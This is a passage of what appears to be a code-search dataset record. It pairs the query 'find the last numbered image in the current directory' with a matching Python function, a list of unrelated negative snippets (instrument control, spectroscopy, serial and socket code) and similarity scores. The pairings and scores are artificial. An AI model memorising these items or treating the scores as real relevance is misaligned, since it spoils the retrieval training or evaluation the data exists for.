aData.append(1)#Spin Magnitude\r\n aData.append('')#valence\r\n #-------------------------------------------------------------------\r\n atoms.append(aData)\r\n \r\n self.atomTable.SetValue(i, 0, atomLabels[i])\r\n self.atomTable.SetValue(i, 2, xPositions[i])\r\n self.atomTable.SetValue(i, 3, yPositions[i])\r\n self.atomTable.SetValue(i, 4, zPositions[i])\r\n \r\n #Create a Magnetic Cell\r\n self.MagCell = MagneticCell(unitcell, 1,1,1, spaceGroup)\r\n\r\n\r\n Na = 1 #Cif files only contain 1 unit cell\r\n Nb = 1\r\n Nc = 1\r\n \r\n #self.cellChange(spaceGroupInt, a, b, c, alpha, beta, gamma, magNa = Na, magNb = Nb, magNc = Nc, cutNa = Na, cutNb = Nb, cutNc = Nc, atomData = atoms)\n self.updateCell(spaceGroupInt, a, b, c, alpha, beta, gamma, magNa = Na, magNb = Nb, magNc = Nc, cutNa = Na, cutNb = Nb, cutNc = Nc, atomData = atoms)\n self.refreshGUI()\n \n \r\n #send signal to the cell window to show the info that has been loaded and to vtkWindow to draw it\r\n n = self.atomTable.GetNumberRows()\r\n for i in range(n):\r\n print self.atomTable.GetValue(i, 0)\r\n send(signal = \"File Load\", sender = \"Session\", spaceGroup = spaceGroupInt, a = a, b = b, c = c, alpha = alpha, beta = beta, gamma = gamma, magNa = Na, magNb = Nb, magNc = Nc, cutNa = Na, cutNb = Nb, cutNc = Nc)", "def __init__(self, state, cval=True, conditional=\"eq\"):\n self.variable = state\n self.cval = cval\n self.conditional = conditional\n self.sending = bridgectl.sending\n self.type = bridgectl.type\n self.target = bridgectl.target", "def func_Ic_318(cp, cd):\n return cp/(np.pi*(cd/2)**2)", "def control_c(self) -> None:\n time.sleep(0.1) # sometimes it's better to wait a bit\n send_control_c(self.proc, True)", "def update_interface(self, cd):\n # Creating a self.cd so that other methods can access it\n self.cd = cd\n self.inhale_time_val.setText(f\"{self.cd['inhale_duration']:.1f} s\")\n self.exhale_time_val.setText(f\"{self.cd['exhale_duration']:.1f} s\")\n self.IE_ratio_val.setText(f\"1:{self.cd['IE_ratio']:.1f}\")\n self.peak_pressure_val.setText(f\"{self.cd['peak_pressure']:.2f} cmH2O\")\n self.tidal_volume_val.setText(f\"{self.cd['tidal_volume']:.0f} ml\")\n self.tidal_volume_val.setText(f\"{self.cd['tidal_volume']:.0f} ml\")", "def COM(fp):\n length = unpack('>H', fp.read(2))[0]\n comment = unpack('{}s'.format(length - 2), fp.read(length - 2))[0]\n\n info = {\n 'Lc' : length,\n 'Cm' : comment\n }\n\n return info", "def cd(self):\n self._pad.cd()", "def dicom_cli():", "def c(self):\r\n return self.__c", "def get_switch(self, conf, dpid):\n\t\tpass", "def get_spectrum(self):\n\n self.sock.send('Q')\n self.sock.send(str(100 * self.center_wl))\n\n response = self.sock.recv(7)\n if not response:\n raise InstrumentError(\n 'No response from Labview client, try reconnecting')\n\n datalen = int(response)\n data = ''\n\n while datalen > 0:\n # read data in chunks\n dt = self.sock.recv(datalen)\n data += dt\n datalen -= len(dt)\n\n data = data.split(\"\\n\")[:-1]\n for i in range(len(data)):\n data[i] = data[i].split(\"\\t\")\n\n data = n.array(data,dtype=float)\n\n wl = data[0]\n ccd = data[1:]\n\n return wl,ccd\n\n #self.sock.close()", "def enable_cl1_direct(self):\n self.write_versa5(0x17,0x02) ## Change top multiplier to 0x22\n self.write_versa5(0x18,0x20)\n self.write_versa5(0x10,0xc0) ## Enable xtal and clock\n self.write_versa5(0x13,0x03) ## Switch to clock\n self.write_versa5(0x10,0x44) ## Enable clock input only and refmode\n self.write_versa5(0x21,0x0c) ## Use previous channel, direct input, may have skew", "def command(self):\n saw_error = False\n try:\n analog_gain = float(self.value_analog.get())\n except:\n print(\"analog must be floating point value\")\n self.value_analog.set(str(self.tcp_comms.tcp_params.analog_gain_target))\n saw_error = True\n try:\n digital_gain = float(self.value_digital.get())\n except:\n print(\"digital must be floating point value\")\n self.value_digital.set(str(self.tcp_comms.tcp_params.digital_gain_target))\n saw_error = True\n try:\n analog_tol = float(self.value_analog_tol.get())\n except:\n print(\"analog tol must be floating point value\")\n self.value_analog_tol.set(str(self.tcp_comms.tcp_params.analog_gain_tol))\n saw_error = True\n try:\n digital_tol = float(self.value_digital_tol.get())\n except:\n print(\"digital tol must be floating point value\")\n self.value_digital_tol.set(str(self.tcp_comms.tcp_params.digital_gain_tol))\n saw_error = True\n if not saw_error:\n self.tcp_comms.tcp_params.analog_gain_target = analog_gain\n self.tcp_comms.tcp_params.digital_gain_target = digital_gain\n self.tcp_comms.tcp_params.analog_gain_tol = analog_tol\n self.tcp_comms.tcp_params.digital_gain_tol = digital_tol\n self.tcp_comms.send_freeze_exposure(analog_gain, analog_tol, digital_gain, digital_tol)", "def __init__(self, devtype, device):\n #\n self.Type = devtype # SERIAL, FILE, other? \n self.Device = device # ELM327, other? used to determine which reader commands to send (separate from OBD2 cmds)\n #\n self.debug = 0 # debug level, 0 = off, higher is more...\n #\n self.State = 0 # 1 is connected, 0 is disconnected/failed\n self.recwaiting = 0 # 0 = no record waiting (can send new cmd), 1 = record waiting to be retrieved\n #\n self.Style = 'old' # 'old', 'can' used to determine how to interpret the results, gets updated by connect()\n self.Headers = 0 # ECU headers, 1 is on, 0 is off\n #\n self.attr = {} # the list of device attributes and their values\n self.attr_cmds = {} # the list of supported attribute at commands, and the associated attribute\n #\n self.RecordTrace = 0 # 0 = no, 1 = yes record a trace of the serial session\n self.tf_out = None # file to record trace to\n #\n if self.Type == \"SERIAL\":\n self.Port = None # connect later\n elif self.Type == \"FILE\":\n self.tf = None # open later\n self.eof = 0\n else:\n pass\n #\n if self.Device == \"ELM327\":\n self.attr_cmds = {\n 'AT@1' : \"Brand\",\n 'AT@2' : \"Brand2\",\n 'ATI' : \"Firmware\",\n 'ATDP' : \"Proto\",\n 'ATDPN' : \"ProtoNum\",\n 'ATRV' : \"Voltage\",\n }\n else:\n pass\n self.clear_attr()", "def configure(self):\n\t\tself.outChannel = CAClient(self.pvstring + \".AOUT\")\n\t\tself.outChannel.configure()\n\t\tself.inChannel = CAClient(self.pvstring + \".TINP\")\n\t\tself.inChannel.configure()", "def create_circuit(self, circuit, database, str_obj, current_date):\r\n if self._circuit_type in (HC, DHW):\r\n return Circuit(self._connector, circuit[ID],\r\n database, str_obj, self._circuit_type,\r\n self._bus_type, current_date)\r\n elif self._circuit_type == SC:\r\n return BasicCircuit(self._connector, circuit[ID],\r\n database, str_obj, self._circuit_type,\r\n self._bus_type)\r\n return None", "def __init__(self, c, device, sensor_name):\n self._cuby = c\n self._device_id = device['id']\n self._sensor_name = sensor_name\n self._name = '{} {}'.format(\"CubyDev\", sensor_name)\n self._unique_id = 'cuby_sensor {}'.format(self._name)\n self._state = None", "def cvChin(ctrlName, r=1):\r\n # create a simple circle curve:\r\n curve = cmds.curve(n=ctrlName, d=3, p=[(0, 0.8*r, -0.5*r), (0, 0.9*r, -0.7*r), (0, 0, -0.5*r), (0, -0.8*r, -0.7*r), (0, -0.8*r, 1.4*r), (0, -0.3*r, 1.3*r), (0, 0, 1.2*r), (0, 0, 0), (0, 0.8*r, -0.3*r), (0, 0.8*r, -0.5*r)] )\r\n # rename curveShape:\r\n renameShape([curve])\r\n return curve", "def connection_test(\n schemes,\n switching,\n vcw,\n device,\n target_resistance=1,\n abs_err=0.1,\n set_command=\"set_meas_resistance\",\n):\n command = build_command(device, set_command)\n read = build_command(device, \"get_read\")\n vcw.write(device, command)\n res = []\n # Switch on the output of the device and do some other configs\n outputON = build_command(device, (\"set_output\", \"1\"))\n outputOFF = build_command(device, (\"set_output\", \"0\"))\n mode = build_command(device, (\"set_resistance_mode\", \"AUTO\"))\n wire2 = build_command(device, (\"set_resitance_state\", \"OFF\"))\n readingMode = build_command(device, (\"set_reading_mode\", \"RES\"))\n readingModeOLD = build_command(device, (\"set_reading_mode\", \"CURR\"))\n setrear = build_command(device, (\"set_terminal\", \"REAR\"))\n setfront = build_command(device, (\"set_terminal\", \"FRONT\"))\n vcw.write(device, setrear)\n vcw.write(device, mode)\n vcw.write(device, wire2)\n vcw.write(device, readingMode)\n vcw.write(device, outputON)\n for name in schemes:\n switching.switch_to_measurement(name)\n res.append(float(vcw.query(device, read)))\n l.info(\"Resistances of Needle {}: {} Ohms\".format(name, res[-1]))\n switching.switch_to_measurement(\"None\")\n vcw.write(device, readingModeOLD)\n vcw.write(device, outputOFF)\n vcw.write(device, setfront)\n closeness = np.isclose([target_resistance for x in res], res, rtol=0, atol=abs_err)\n\n if np.all(closeness):\n return True, res\n else:\n return np.array(schemes)[~closeness], res", "def d2in():\n\tsetState(\"D2\", \"-DI-PHDGN-02:CON\", CON_IN)", "def get_dacb(tbc):\n return {\n channel: tbc.i2c_socket.yaml_config['roc_s0']['sc']['ch'][channel]['Dacb']\n for channel in range(1, 12)\n }", "def __init__(self, busRestriction=0, devAddressRestriction=0, serialNumber=\"\"):\n self.handle = libcaer.caerDeviceOpen(1, libcaer.CAER_DEVICE_DAVIS, busRestriction, devAddressRestriction, serialNumber)\n self.info = libcaer.caerDavisInfoGet(self.handle)\n\n print(\"device ID: \" + str(libcaer.caer_davis_info_deviceID_get(self.info)))\n\n if (libcaer.caer_davis_info_deviceIsMaster_get(self.info)):\n print(\"device is Master\")\n else:\n print(\"device is Slave\")\n\n print(\"device Serial Number: \" + str(libcaer.caer_davis_info_deviceSerialNumber_get(self.info)))\n print(libcaer.caer_davis_info_deviceString_get(self.info))\n\n self.dvsSizeX = libcaer.caer_davis_info_dvsSizeX_get(self.info)\n self.dvsSizeY = libcaer.caer_davis_info_dvsSizeY_get(self.info)\n\n self.apsSizeX = libcaer.caer_davis_info_apsSizeX_get(self.info)\n self.apsSizeY = libcaer.caer_davis_info_apsSizeY_get(self.info)\n\n # init default biases\n ret = libcaer.caerDeviceSendDefaultConfig(self.handle)\n if(ret == True):\n print(\"Default biases loaded\")\n else:\n print(\"Error while loading default biases\")\n raise Exception\n\n # set blocking data exchange\n ret = libcaer.caerDeviceConfigSet(self.handle, libcaer.CAER_HOST_CONFIG_DATAEXCHANGE, libcaer.CAER_HOST_CONFIG_DATAEXCHANGE_BLOCKING, True)\n if(ret == True):\n print(\"Data exchange set to blocking mode\")\n else:\n print(\"Error in communicating with the device, please check your setup\")\n raise Exception\n\n # start data transfer from device\n ret = libcaer.caerDeviceDataStart(self.handle, None, None, None, None, None)\n if(ret == True):\n print(\"Data transfer started\")\n else:\n print(\"Error in starting data transfer\")\n raise Exception", "def speed_cadence_connect(self):\n self._status_update(\"Speed and Cadence: Scanning...\")\n # Save advertisements, indexed by address\n advs = {}\n for adv in self.ble.start_scan(ProvideServicesAdvertisement, timeout=5):\n if CyclingSpeedAndCadenceService in adv.services:\n self._status_update(\"Speed and Cadence: Found an advertisement\")\n # Save advertisement. Overwrite duplicates from same address (device).\n advs[adv.address] = adv\n\n self.ble.stop_scan()\n self._status_update(\"Speed and Cadence: Stopped scanning\")\n if not advs:\n # Nothing found. Go back and keep looking.\n return []\n\n # Connect to all available CSC sensors.\n self.cyc_connections = []\n for adv in advs.values():\n self.cyc_connections.append(self.ble.connect(adv))\n self._status_update(\"Speed and Cadence: Connected {}\".format(len(self.cyc_connections)))\n\n self.cyc_services = []\n for conn in self.cyc_connections:\n self.cyc_services.append(conn[CyclingSpeedAndCadenceService])\n self._status_update(\"Pyloton: Finishing up...\")\n\n return self.cyc_connections", "def one_transition_spectrum_cd(self,tr):\n \n\n ta = tr[\"ta\"] # TimeAxis\n rr = tr[\"rr\"] # transition dipole strength\n om = tr[\"om\"] # frequency - rwa\n gg = tr[\"gg\"] # natural broadening (constant or time dependent)\n fwhm = tr[\"fwhm\"] # Additional gaussian broadening of the spectra\n sgm = fwhm/(2*numpy.sqrt(2*numpy.log(2)))\n \n # CD and fluorescence can be calculated in this step\n # TODO if rotatory strength defined calculate also circular dichroism spectra\n # TOOD calculate fluorescence spectra (for fluorescence there should be a switch because it should be calculated only for the first transition) \n \n \n if self.system._has_system_bath_coupling:\n# ct = tr[\"ct\"] # correlation function\n \n # convert correlation function to lineshape function\n #gt = self._c2g(ta,ct.data)\n gt = tr[\"gt\"]\n # calculate time dependent response\n at = numpy.exp(-gt -1j*om*ta.data)\n else:\n # calculate time dependent response\n at = numpy.exp(-1j*om*ta.data) \n# plt.figure()\n# plt.title(\"Absorption\")\n# plt.plot(ta.data,numpy.real(at))\n# plt.plot(ta.data,numpy.imag(at))\n \n \n if len(gg) == 1:\n gam = gg[0]\n rt = numpy.exp(gam*ta.data)\n at *= rt\n #print(\"Constant: \", rt[20], len(at))\n else:\n rt = numpy.exp((gg)*ta.data) \n at *= rt\n #print(\"Time dependent: len = \", rt[20], len(rt))\n \n if fwhm!=0.0:\n gauss = numpy.exp(-2*(numpy.pi**2)*(sgm**2)*(ta.data**2))\n at *= gauss\n \n # Fourier transform the result\n ft = rr*numpy.fft.hfft(at)*ta.step\n ft = numpy.fft.fftshift(ft)\n # invert the order because hfft is a transform with -i\n ft = numpy.flipud(ft) \n # cut the center of the spectrum\n Nt = ta.length #len(ta.data) \n return ft[Nt//2:Nt+Nt//2]", "def connect():\n try:\n MotorController.serial_connection = serial.Serial(\"/dev/ttyUSB0\")\n MotorController.serial_connection.timeout = 1\n MotorController.serial_connection.baudrate = 115200\n MotorController.serial_connection.xonxoff = True\n MotorController.serial_connection.stopbits = serial.STOPBITS_ONE\n MotorController.serial_connection.parity = serial.PARITY_NONE\n MotorController.serial_connection.bytesize = serial.EIGHTBITS\n MotorController.is_connected = True\n MotorController.serial_connection.write('G0 X4\\r\\n'.encode('utf-8')) #Need to do an absolute move on any axis to be able to do relative moves\n MotorController.serial_connection.write('b!%\\n'.encode('utf-8')) #This line allows for the first command to complete else the command never ends. Don't know why maybe some end of line character or buffer bug\n except serial.SerialException as error:\n return 'Could not connect to motor controller ' + error.__str__()", "def DAC(fp):\n length = unpack('>H', fp.read(2))[0]\n _remaining = length - 2\n\n _tc, _tb, _cs = [], [], []\n while _remaining:\n tc, tb = _split_byte(fp.read(1))\n _cs.append(unpack('>B', fp.read(1))[0])\n _remaining -= 2\n _tc.append(tc)\n _tb.append(tb)\n\n info = {\n 'La' : length,\n 'Tc' : _tc,\n 'Tb' : _tb,\n 'Cs' : _cs\n }\n\n return info", "def set_c(self, c):\n self.c = c", "def ocpc(self, ocpc):\n\n self._ocpc = ocpc", "def connectivity(band, method, sfreq):\n from neuropype_ephy.interfaces.mne.spectral import SpectralConn\n # if not method:\n # method = ('imcoh',)\n freq_bands = [list(t) for t in band]\n\n sp_conn = pe.Node(interface=SpectralConn(), name='sp_conn')\n # sp_conn.inputs.con_method = con_method\n sp_conn.inputs.sfreq = sfreq\n sp_conn.iterables = [('freq_band', freq_bands), ('con_method', method)]\n return sp_conn", "def performOpen(self, options={}):\n self.switch = USB_Digital_Switch() # Create an instance of the switch class\n self.serial_number = str(self.getAddress())\n\n status = self.establish_connection() # Connect the switch (pass the serial number as an argument if required)\n if status > 0:\n resp = self.switch.Send_SCPI(\":MN?\", \"\") # Read model name\n self.model_number = str(resp[2])\n self.setModel(self.model_number)\n self.log(self.model_number, level = 30)", "def c(self):\n return self._c", "def cdap_interaction_coefficients(configs_dir):\n f = os.path.join(configs_dir, 'cdap_interaction_coefficients.csv')\n return pd.read_csv(f, comment='#')", "def __init__(\n self,\n channel,\n discharge_pin,\n leds_object=None,\n temperature_sensors=None,\n current_sensors=None,\n low_voltage_cutoff=2.5,\n start_discharge_voltage_cutoff=3,\n temperature_cutoff=50,\n ):\n self.channel = str(channel)\n self.low_voltage_cutoff = low_voltage_cutoff\n self.start_discharge_voltage_cutoff = start_discharge_voltage_cutoff\n self.temperature_cutoff = temperature_cutoff\n self.discharge_pin = Pin(discharge_pin, Pin.OUT)\n self.leds = leds_object\n self.temperature_sensors = temperature_sensors\n self.current_sensors = current_sensors\n self.state = \"empty\"\n self.led_state = 0\n self.discharge_stats = None\n self.temperature = 0\n\n self.voltage_and_current = self.request_voltage_and_current()\n self.current = self.request_current()\n\n self.discharge_pin.off()", "def _config_md(self):\n self.cntrl[\"imin\"] = 0\n self.cntrl[\"ntx\"] = 1\n self.cntrl[\"irest\"] = 0\n self.cntrl[\"maxcyc\"] = 0\n self.cntrl[\"ncyc\"] = 0\n self.cntrl[\"dt\"] = 0.002\n self.cntrl[\"nstlim\"] = 5000\n self.cntrl[\"ntpr\"] = 500\n self.cntrl[\"ntwe\"] = 500\n self.cntrl[\"ntwr\"] = 5000\n self.cntrl[\"ntwx\"] = 500\n self.cntrl[\"ntxo\"] = 1\n self.cntrl[\"ioutfm\"] = 1\n self.cntrl[\"ntf\"] = 2\n self.cntrl[\"ntc\"] = 2\n self.cntrl[\"ntt\"] = 3\n self.cntrl[\"gamma_ln\"] = 1.0\n self.cntrl[\"ig\"] = -1", "def __init__(self, i2c, gain=1, data_rate=None, mode=Mode.SINGLE,\n address=_ADS1X15_DEFAULT_ADDRESS, ):\n self.i2c_device = i2c\n self._i2c_addr = address\n self._last_pin_read = None\n self._data_rate = None\n self._gain = None\n self._mode = None\n self._channelMask = 0x00\n info = self._chip_info()\n self._chan_count = info[3]\n self._shift_fact = info[2]\n self._is_diff = False\n self._data = array.array('i', [0]*self._chan_count)\n self.gain = gain\n self.mode = mode\n self.data_rate = data_rate if data_rate else self._data_rate_default()\n print(ansi.GREEN +\"[{0:>12}] {1:35} ({2}): ok\"\n .format(info[0], \"4-channel A/D\", info[1]) +ansi.BLACK)", "def read_bits_c(self, ctrl_pin):\n while True:\n self.read_bits(ctrl_pin)\n time.sleep(1)", "def set_comms_mode(self):", "def setCh(self, ch):\n if (self.model == 'TDS'):\n # according to the manual, RIBanary mode with 2-bit width is\n # the fastest mode for data transfer.\n # but I have to think 1-bit transfer ought to be faster.\n self.write('DATa:SOUrce CH'+str(ch)+\n '; ENCdg RIBinary; STARt 1; STOP 2500; WIDth 1\\n')\n # obtain vertical scale and offset (for calibration)", "def _start_device(self):\r\n enabled = [1,1,1,0]\r\n self._data = [np.empty(self._samples,dtype=np.int16) for i in range(3)]\r\n self._data_buffer = [x.ctypes for x in self._data]\r\n self._timebase = self.get_timebase(self._sampling_time)\r\n self.v_rangeAPI = [7,7,7,0] # 5V range\r\n self.v_range = [CHANNEL_RANGE[i][\"rangeV\"] for i in self.v_rangeAPI]\r\n with self._driver_lock:\r\n for i,v,en in zip(range(4),self.v_rangeAPI,enabled): # three active channels\r\n m = self._lib.ps2000aSetChannel(self._handle,\r\n c_int32(i), # channel\r\n c_int16(en), # enabled\r\n c_int32(1), # DC coupling\r\n c_int32(v), # voltage range (API value)\r\n c_float(0)) # 0V offset\r\n check_result(m)\r\n\r\n if en:\r\n m = self._lib.ps2000aSetDataBuffer(self._handle,\r\n c_int32(i), # channel\r\n self._data_buffer[i],\r\n c_int32(self._samples),\r\n c_uint32(0), # segment index\r\n c_int32(0)) # ratio mode\r\n check_result(m)\r\n\r\n threshold_v = 3\r\n threshold_adc = int(threshold_v * MAX_EXT / self.v_range[2])\r\n m = self._lib.ps2000aSetSimpleTrigger(self._handle,\r\n c_int16(1), # enabled\r\n c_int32(2), # Trigger off Channel C\r\n c_int16(threshold_adc),\r\n c_int32(2), # direction = rising\r\n c_uint32(0), # no delay\r\n c_int16(2000)) # autotrigger after 2 seconds if no trigger occurs\r\n check_result(m)\r\n\r\n # Send AWG Info to Picoscope\r\n delta_phase = c_uint32()\r\n output_freq = 1/self._sampling_duration\r\n # output_freq = 1E6\r\n m = self._lib.ps2000aSigGenFrequencyToPhase(self._handle,\r\n c_double(output_freq),\r\n c_int32(0),\r\n c_uint32(len(self._waveform)),\r\n byref(delta_phase))\r\n check_result(m)\r\n delta_phase = int(delta_phase.value)\r\n offset_voltage = 1\r\n pk2pk = 2\r\n # output_freq = 1E6\r\n # wave_type = {'sine':0,'square':1,'triangle':2,'DC':3,\r\n # 'rising sawtooth':4,'falling sawtooth':5,'sin(x)/x':6,\r\n # 'Gaussian':7,'half-sine':8}\r\n waveformPtr = self._waveform.ctypes\r\n trigger_type = 2 # siggen gate high\r\n trigger_source = 4 # software trigger\r\n m = self._lib.ps2000aSetSigGenArbitrary(self._handle,\r\n c_int32(int(offset_voltage*1E6)), \r\n c_uint32(int(pk2pk*1E6)),\r\n c_uint32(delta_phase), # start delta phase\r\n c_uint32(delta_phase), # stop delta phase\r\n c_uint32(0), # delta phase increment\r\n c_uint32(0), # dwell count\r\n waveformPtr, # arbitrary waveform\r\n c_int32(self._samples), # arbitrary waveform size\r\n c_int32(0), # sweep type for delta phase\r\n c_int32(0), # extra operations\r\n c_int32(0), # index mode\r\n c_uint32(1), # shots\r\n c_uint32(0), # sweeps\r\n c_int32(trigger_type),\r\n c_int32(trigger_source),\r\n c_int16(0)) # extIn threshold\r\n check_result(m)\r\n # m = self._lib.ps2000aSetSigGenBuiltIn(self._handle,\r\n # c_int32(int(offset_voltage*1E6)), # offset voltage\r\n # c_uint32(int(pk2pk*1E6)),# peak to peak voltage\r\n # c_int32(wave_type['square']), # wave type\r\n # c_float(output_freq), # start frequency\r\n # c_float(output_freq), # stop frequency\r\n # c_float(0), # increment\r\n # c_float(0), # dwell count\r\n # c_int32(0), # sweep type\r\n # c_int32(0), # operation\r\n # c_uint32(4), # shots\r\n # c_uint32(0), # sweeps\r\n # c_int32(trigger_type), \r\n # c_int32(trigger_source),\r\n # c_int16(0)) # extIn threshold\r\n # check_result(m)\r\n\r\n # for i in enabled:\r\n # if i:\r\n # m = self._lib.ps2000aSetDataBuffer(self._handle,\r\n # c_int32(i), # channel\r\n # self._data_buffer[i],\r\n # c_int32(self._samples),\r\n # c_uint32(0), # segment index\r\n # c_int32(0)) # ratio mode\r\n # check_result(m)\r\n\r\n self._save_thread = Thread(target=self.save,args=(self._save_queue,))\r\n self._save_thread.daemon = True\r\n self._save_thread.start()\r\n\r\n self._process_thread = Thread(target=self.process,args=(self._process_queue,self._save_queue))\r\n self._process_thread.daemon = True\r\n self._process_thread.start()\r\n\r\n self._collect_thread = Thread(target=self.run_loop,args=(self._process_queue,))\r\n self._collect_thread.daemon = True\r\n self._collect_thread.start()\r\n\r\n return True", "def init(self):\n self.IP_ADDRESS = \"192.168.16.55\"\n self.PORT = 8888\n self.windFreakConnection = windFreakClient.ConnectionConstantFrequency(IP_ADDRESS=self.IP_ADDRESS, port=self.PORT) \n self.initialised=True\n return \"%s init successful\" % self.hardwareActionName", "def duty_cycle(self,duty_cycle):\n self.load.write(f'TRAN:DCYC {duty_cycle}')", "def get_cmdb_data(device_type):\n pass", "def _computeCcdExposureId(self, dataId):\n pathId = self._transformId(dataId)\n visit = pathId['visit']\n ccd = pathId['ccd']\n return visit*200 + ccd", "def d2out():\n\tsetState(\"D2\", \"-DI-PHDGN-02:CON\", CON_OUT)", "def get_c(layer_configs):\n net_config = layer_configs['000_net']\n return net_config.get('channels', 3)", "def initConnTermFrame(self,referenceID):\r\n # Strip any colons in the mac address\r\n self.referenceID = referenceID\r\n\r\n # Set the frame content\r\n self.content = \"\"\r\n\r\n # Set the content length\r\n self.contentLength = 0\r\n\r\n # Set the correct frame message type\r\n self.mesgType = MULTIPLEXER_CONN_TERM", "def __getChemDrawCmd(self):\n return self.__getCmd(\"JUMBO_HOME\", \"cdx2cml\", \"ChemDraw to CML\")", "def establish_connection(self, data, data_size, acpi, dest_group_addr):\n # -----------------------------------\n # -> (1) Sending Connection request\n # -----------------------------------\n conn_resp_object = self.connection_request()\n # <- Retrieving channel_id & status from Connection response\n conn_channel_id = conn_resp_object.channel_id\n conn_status = conn_resp_object.status\n self.channel_id = conn_channel_id\n print('Channel ID: ', conn_channel_id)\n print('Channel status: ', conn_status)\n print('-----------------------------------')\n # -----------------------------------\n # -> (2) Sending Connection State request\n # -----------------------------------\n state_resp_object = self.connection_state_request()\n # <- Retrieving channel_id & status from Connection State response\n state_channel_id = state_resp_object.channel_id\n state_status = state_resp_object.status\n print('Channel ID: ', state_channel_id)\n print('Channel status: ', state_status)\n print('-----------------------------------')\n # -----------------------------------\n # -> (3) Tunneling request\n # -----------------------------------\n tunnel_resp_object = self.tunneling_request(data, data_size, dest_group_addr, acpi)\n # <- Retrieving data from Tunneling response\n tunnel_channel_id = tunnel_resp_object.channel_id\n tunnel_status = tunnel_resp_object.status\n self.sequence_counter = tunnel_resp_object.sequence_counter\n print('Channel ID: ', tunnel_channel_id)\n print('Channel status: ', tunnel_status)\n print('Sequence counter: ', self.sequence_counter)\n print('-----------------------------------')\n # -----------------------------------\n # -> (4) Tunneling request read\n # -----------------------------------\n self.tunneling_request_read()", "def test_ccds(self):\n #TODO write ccds tests", "def get_ctf(ima):\n\tfrom EMAN2 import EMAN2Ctf\n\tctf_params = ima.get_attr(\"ctf\")\t\n\treturn ctf_params.defocus, ctf_params.cs, ctf_params.voltage, ctf_params.apix, ctf_params.bfactor, ctf_params.ampcont, ctf_params.dfdiff, ctf_params.dfang", "def DIOchannels(tree, DAQcard, DIOnum):\n diocardpath = '.SETTINGS.NI.NI_6133_DIO.DAQ_' + str(DAQcard)\n diopath = diocardpath + '.CHANNEL_' + str(DIOnum)\n tree.addNode(diopath)\n AddNodeWithTag(tree, diopath + ':CHANNEL_NAME', 'TEXT',\n 'USERNAME_DIOCARD' + str(DAQcard) + 'CH' + str(DIOnum))\n AddNodeWithTag(tree, diopath + ':NI_NAME', 'TEXT',\n 'NINAME_DIOCARD' + str(DAQcard) + 'CH' + str(DIOnum))", "def pcd(dw, qpts=50):\n w = w0+dw\n pcm.set_qpts(qpts)\n sml = pcm.sml_w(w)\n avgchi = pcm.avgchi\n pcm.set_qpts(0)\n sml2 = pcm.sml_w(w)\n print sml, log(sml) - pcm.offset, avgchi\n print sml2, log(sml2) - pcm.offset, pcm.avgchi", "def enable_cable_ports(cid):\n\n SQL.execute('''\n SELECT \n cpid,\n guid,\n port,\n hca\n FROM \n cable_ports \n WHERE\n cid = ?\n ''',(\n cid,\n ))\n\n for row in SQL.fetchall(): \n if row['hca']:\n vlog(3, 'skip enabling hca for p%s' % ( row['cpid'] ))\n elif not DISABLE_PORT_STATE_CHANGE:\n ib_mgt.enable_port(int(row['guid']), int(row['port']))" ]
[ "0.5991389", "0.5908873", "0.563912", "0.5434294", "0.54057074", "0.53454", "0.53262013", "0.5306355", "0.52807844", "0.52574426", "0.5246854", "0.5221757", "0.5210567", "0.51662695", "0.51509064", "0.5141476", "0.51294994", "0.5121288", "0.5110107", "0.5095082", "0.50932145", "0.5077673", "0.5072095", "0.5043145", "0.5042253", "0.50344265", "0.4938216", "0.49361742", "0.49114913", "0.4899763", "0.48927155", "0.48894477", "0.48772028", "0.48735327", "0.4867126", "0.48560908", "0.4855939", "0.4844126", "0.48439893", "0.48437482", "0.4843705", "0.4825818", "0.48248172", "0.4814526", "0.48091716", "0.48010376", "0.48000258", "0.47986856", "0.4777988", "0.47774637", "0.477718", "0.4777083", "0.47692075", "0.47685245", "0.47642013", "0.47604436", "0.47541267", "0.475226", "0.47493333", "0.4739708", "0.47343662", "0.47334373", "0.472136", "0.47158542", "0.47146788", "0.4711273", "0.46998245", "0.46996582", "0.46994895", "0.4697589", "0.4696797", "0.46946186", "0.46861428", "0.4677487", "0.4670255", "0.46695364", "0.46642157", "0.46548146", "0.4650252", "0.4638919", "0.46379697", "0.46368176", "0.46336836", "0.46313205", "0.46299815", "0.46234035", "0.4621793", "0.46184915", "0.461528", "0.46132112", "0.46099958", "0.46098462", "0.46096763", "0.4608119", "0.46076223", "0.46076125", "0.46070442", "0.46068588", "0.46009514", "0.46000397" ]
0.7094732
0
Find the last numbered image in the current directory.
def last_image(fileDir): lastNum = 0 lastImg = '' # find the name and number of the last image in the current directory for f in os.listdir(fileDir): if os.path.isfile(os.path.join(fileDir, f)): file_name = os.path.splitext(f)[0] file_name2 = file_name[4:] try: file_num = int(file_name2) if file_num > lastNum: lastNum = file_num lastImg = os.path.join(fileDir, f) except ValueError: 'The file name "%s" is not an integer. Skipping' % file_name return lastNum, lastImg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_last_counter():\n counter = imageNumStart\n if imageNumOn:\n image_ext = \".jpg\"\n search_str = imagePath + \"/*\" + image_ext\n file_prefix_len = len(imagePath + imageNamePrefix)+1\n try:\n # Scan image folder for most recent jpg file\n # and try to extract most recent number counter from file name\n newest = max(glob.iglob(search_str), key=os.path.getctime)\n count_str = newest[file_prefix_len:newest.find(image_ext)]\n print(\"%s INFO : Last Saved Image is %s Try to Convert %s\"\n % (get_now(), newest, count_str))\n counter = int(count_str)+1\n print(\"%s INFO : Next Image Counter is %i\"\n % (get_now(), counter))\n except:\n print(\"%s WARN : Restart Numbering at %i \"\n \"WARNING: Previous Files May be Over Written.\"\n % (get_now(), counter))\n return counter", "def _get_latest_inc(path):\n\n images = [os.path.join(path, image) for image in os.listdir(path) if '.png' in image]\n\n if not images:\n return 0\n else:\n return int(re.search('(?P<inc>\\d+).png$', max(images, key=os.path.getctime)).group('inc'))", "def find_last_image(self) -> List[str]:\n\n soup = self.load_page()\n url_to_down = soup.select('.comicimage')[0].get('src')\n\n filename = str(os.path.basename(url_to_down))\n\n return [url_to_down, filename]", "def LastImage(self, *args):\n return _BRepAlgo.BRepAlgo_Image_LastImage(self, *args)", "def determine_output_ending():\n file_found = False\n idx = 1\n while not file_found:\n if not os.path.isfile(LOG_DIR + \"/output%04d.png\" % (idx)):\n return \"%04d\" % (idx)\n idx += 1", "def find_last_image(self) -> List[str]:\n\n soup = self.load_page()\n\n txt_from_site = soup.select('.full-image-block')\n\n url_to_down = \"http://www.lunarbaboon.com/\" + str(txt_from_site[0])[\n str(txt_from_site).find('/storage'):str(txt_from_site).find(\n 